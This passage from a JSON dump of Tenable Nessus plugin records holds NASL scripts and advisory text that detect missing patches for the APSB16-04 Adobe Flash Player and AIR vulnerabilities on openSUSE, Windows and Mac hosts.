\"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-186)\");\n script_summary(english:\"Check for the openSUSE-2016-186 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (bsc#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.569-153.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.569-153.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.569-153.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:29:58", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (boo#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-11T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2016-183)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2016-02-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player"], "id": "OPENSUSE-2016-183.NASL", "href": "https://www.tenable.com/plugins/nessus/88688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-183.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88688);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-183)\");\n script_summary(english:\"Check for the openSUSE-2016-183 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (boo#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.569-2.88.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.569-2.88.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.569-2.88.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:15:57", "description": "The version of Adobe AIR installed on the remote Windows host is prior\nor equal to version 20.0.0.233. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe AIR <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88638", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88638);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe AIR <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the version of AIR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Windows host is prior\nor equal to version 20.0.0.233. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 20.0.0.260 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '20.0.0.233';\nfix = '20.0.0.260';\nfix_ui = '20.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:44:19", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis prior or equal to version 20.0.0.286. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe Flash Player <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88639", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88639);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe Flash Player <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis prior or equal to version 20.0.0.286. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 20.0.0.306 or later.\n\nAlternatively, Adobe has made version 18.0.0.329 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 20.0.0.286\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"20.0.0.286\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 18.0.0.326\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.326\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 19 <= 20.0.0.286\n else if(variant != \"Chrome_Pepper\" && ver =~ \"^(?:19|[2-9]\\d)\\.\")\n {\n if (variant == \"ActiveX\" && ver_compare(ver:ver,fix:\"20.0.0.286\",strict:FALSE) <= 0)\n vuln = TRUE;\n else if (ver_compare(ver:ver,fix:\"20.0.0.286\",strict:FALSE) <= 0)\n vuln = TRUE;\n }\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"20.0.0.306 / 18.0.0.329\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"20.0.0.306 / 18.0.0.329\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 20.0.0.306\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 20.0.0.306 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:42:57", "description": "The version of Adobe AIR installed on the remote Mac OS X host is\nprior or equal to version 20.0.0.233. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe AIR for Mac <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88640", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88640);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n 